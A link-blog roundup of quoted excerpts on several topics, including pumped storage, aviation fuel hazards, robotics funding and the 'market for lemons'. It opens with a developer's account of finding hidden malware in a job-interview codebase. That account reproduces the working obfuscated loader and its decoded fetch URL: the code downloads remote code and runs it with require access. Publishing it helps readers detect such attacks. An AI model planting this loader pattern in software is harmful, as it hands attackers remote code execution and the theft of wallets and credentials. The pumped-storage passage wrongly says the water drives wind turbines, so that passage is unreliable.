David Dodda talking about his recent escape from being hacked by an ingenious method.

Before hitting npm start, I threw this prompt at my Cursor AI agent:

“Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

AI saved the day.

I read about the concept of pumped storage plant in 2020. Now I am seeing its discussion happening in India.

The Daily Brief explaning the concept with a nifty little diagram.

Here’s how a PSP basically works. It has electric pumps that are powered using solar. So, when you have excess solar power at midday, the PSP pumps water uphill from a lower reservoir to an upper one. Come sunset, when solar dies and demand spikes the PSP releases the same water, whose downhill gravity powers wind turbines. The water also gets stored back again in the lower reservoir.

In short, a PSP uses energy conversion to ensure that excess power is never wasted.

Image credits: The Daily Brief

Ted Lamade writing about taking whatever chances that you get, especially the insignificant ones. He then shares below quote by William McRaven from his book ‘The Wisdom of the Bullfrog’.

I found in my career that if you take pride in the little jobs, people will think you worthy of the bigger jobs

This comment by kqr on the news that Ryanair flight landed at Manchester airport with just six minutes of fuel left.

In safety-critical systems, we distinguish between accidents (actual loss, e.g. lives, equipment, etc.) and hazardous states. The equation is

hazardous state + environmental conditions = accident

Since we can only control the system, and not its environment, we focus on preventing hazardous states, rather than accidents. If we can keep the system out of all hazardous states, we also avoid accidents. (Trying to prevent accidents while not paying attention to hazardous states amounts to relying on the environment always being on our side, and is bound to fail eventually.)

One such hazardous state we have defined in aviation is “less than N minutes of fuel remaining when landing”. If an aircraft lands with less than N minutes of fuel on board, it would only have taken bad environmental conditions to make it crash, rather than land. Thus we design commercial aviation so that planes always have N minutes of fuel remaining when landing. If they don’t, that’s a big deal: they’ve entered a hazardous state, and we never want to see that. (I don’t remember if N is 30 or 45 or 60 but somewhere in that region.)

For another example, one of my children loves playing around cliffs and rocks. Initially he was very keen on promising me that he wouldn’t fall down. I explained the difference between accidents and hazardous states to him in childrens’ terms, and he realised slowly that he cannot control whether or not he has an accident, so it’s a bad idea to promise me that he won’t have an accident. What he can control is whether or not bad environmental conditions lead to an accident, and he does that by keeping out of hazardous states. In this case, the hazardous state would be standing less than a child-height within a ledge when there is nobody below ready to catch. He can promise me to avoid that, and that satisfies me a lot more than a promise to not fall.

Om Malik’s interview with Rodney Brooks.

Om: It’s much easier to fund the promise than a real business, because real businesses have limitations on how fast they can grow. Whereas if you don’t know, you can live (and fund) the dream. There’s nothing wrong with living the dream—that’s how you get to fund crazy things in this industry. But people doing more rational things do pay the price.

You’ve been in robotics for a long time. There are misconceptions about robots and robotics. The biggest fallacy is that we think of them in human form. Ten years later, that idea of a humanoid has become so pervasive. We don’t think about things that do robotic tasks, like ad systems that serve ads constantly—they are also robots.

Rodney: The robots—they’re not embodied. I always say about a physical robot, the physical appearance makes a promise about what it can do. The Roomba was this little disc on the floor. It didn’t promise much—you saw it and thought, that’s not going to clean the windows. But you can imagine it cleaning the floor. But the human form sort of promises it can do anything a human can. And that’s why it’s so attractive to people—it’s selling a promise that is amazing.

Om’s statement highlights the current state of AI. Everybody is funding the dream.

Rodney’s statement highlights the business idea which actually needs funding but isn’t getting one.

Jameel Ur Rahman shares his take on how overcoming friction leads to growth. We have seen this in nature where the struggle of butterfly to come out of its cocoon helps develop its wings. But this comment by gwd makes a distinction between friction and effort.

Can I make a distinction between “friction” and “effort”?

If you’re riding a bike up a hill, you can’t go up without effort. But not all of your effort is actually moving you up the hill — some of it is being lost in friction: inefficiencies in your muscles, friction in your gears and wheel and chain, wind resistance.

Similarly, you can’t learn anything without effort; but it’s often the case that effort you put in ends up wasted: if you’re learning a language, time spent looking for content rather than studying content is friction; effort spent forcing yourself to read something that’s too hard is effort you could have spent more profitably elsewhere.

Put that way, we should minimize friction, so that we can maximize the amount our effort goes towards actually growing.

Frank Chimero referring to the paper by George Akerlof and explaining what a market for lemons means. He then goes ahead and explains that we are in the lemon stage of the internet.

The idea is called “a market for lemons.” The phrase comes from a 1970 paper by George Akerlof that explains how information asymmetry between buyers and sellers can undermine a marketplace. Akerlof asks us to imagine ourselves buying a used car. Some cars on the lot are reliable, well-maintained gems. Others cars are lemons, the kinds of cars that can make it off the lot but are disasters waiting to happen. The sellers know which cars are which, but you, as a buyer, can’t tell the difference. That information asymmetry affects the average price in the market and eventually impacts the overall market dynamics.

The thinking goes like this: if a buyer can’t distinguish between good and bad, everything gets priced somewhere in the middle. If you’re selling junk, this is fantastic news—you’ll probably get paid more than your lemon is worth. If you’re selling a quality used car, this price is insultingly low. As a result, people with good cars leave the market to sell their stuff elsewhere, which pushes the overall quality and price down even further, until eventually all that’s left on the market are lemons.

I think we’re in the lemon stage of the internet.